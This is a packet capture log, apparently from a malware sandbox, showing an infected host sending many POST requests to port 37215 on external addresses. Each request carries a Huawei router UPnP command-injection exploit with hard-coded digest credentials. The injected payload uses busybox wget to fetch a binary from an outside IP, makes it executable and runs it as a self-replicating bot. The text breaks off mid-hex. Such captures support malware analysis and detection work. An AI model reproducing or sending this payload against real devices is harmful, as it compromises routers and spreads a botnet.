                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  340192.168.2.1354778157.212.56.18737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228560925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  341192.168.2.135432689.99.187.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228580952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  342192.168.2.1337280157.82.185.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228602886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  343192.168.2.134920237.45.199.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228630066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  344192.168.2.134063841.179.240.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.228648901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  345192.168.2.135365069.37.43.2637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.230927944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  346192.168.2.1338150197.88.199.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.230954885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  347192.168.2.1348334157.240.99.17437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.230972052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  348192.168.2.1346018157.247.20.3737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.230990887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  349192.168.2.1343690197.77.219.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231008053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 